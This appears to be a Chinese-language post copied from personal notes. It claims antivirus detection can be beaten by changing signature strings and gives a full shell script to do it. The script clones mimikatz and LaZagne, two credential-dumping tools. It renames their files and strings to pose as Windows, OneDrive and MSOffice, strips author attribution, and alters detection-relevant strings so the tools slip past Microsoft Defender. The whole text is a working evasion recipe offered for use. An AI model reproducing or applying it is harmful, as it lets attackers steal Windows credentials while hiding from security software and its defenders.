其实现在的杀软还是玩的老一套,改改特征字符就能过了,最新的defender能用这个方法过
文章直接从笔记复制出来的,有需要的自己看情况用
git clone https://github.com/gentilkiwi/mimikatz.git lmmg mv lmmg/mimikatz lmmg/lmmg find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')"; mv "${FILE}" "${newfile}"; done find lmmg/ -type f -name '*kiwi*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')"; mv "${FILE}" "${newfile}"; done find lmmg/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Windows/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/DELPY/gweep/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/Benjamin/gweeperx/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/creativecommons/notcommons/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/MSOffice/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/KIWI/ONEDRIVE/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Onedrive/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/kiwi/onedrive/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/DumpCreds/DumpCred/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/logonPasswords/logonPassword/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/ArgumentPtr/NotTodayPal/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' cd ./lmmg/lmmg/ sed -i "0,/#if !defined(_POWERKATZ)/! {0,/#if !defined(_POWERKATZ)/ s/#if !defined(_POWERKATZ)//* #if !defined(_POWERKATZ)/}" windows.c sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif *//}}" windows.c lazagne find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')"; mv "${FILE}" "${newfile}"; done find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')"; mv "${FILE}" "${newfile}"; done find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')"; mv "${FILE}" "${newfile}"; done find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')"; mv "${FILE}" "${newfile}"; done find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')"; mv "${FILE}" "${newfile}"; done find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')"; mv "${FILE}" "${newfile}"; done find windows/ -type f -print0 | xargs -0 sed -i 's/lazagne/kmm/g' find windows/ -type f -print0 | xargs -0 sed -i 's/LaZagne/Kmm/g' find windows/ -type f -print0 | xargs -0 sed -i 's/laZagne/KMm/g' find windows/ -type f -print0 | xargs -0 sed -i 's/BANG/bg/g' find windows/ -type f -print0 | xargs -0 sed -i 's/passwords ---------------/vp/g' find windows/ -type f -print0 | xargs -0 sed -i 's/Password not found/nop/g' find windows/ -type f -print0 | xargs -0 sed -i 's/=================================================================/ll/g' find windows/ -type f -print0 | xargs -0 sed -i 's/########## User/lp/g' find windows/ -type f -print0 | xargs -0 sed -i 's/For more information launch it again with the -v option/jj/g'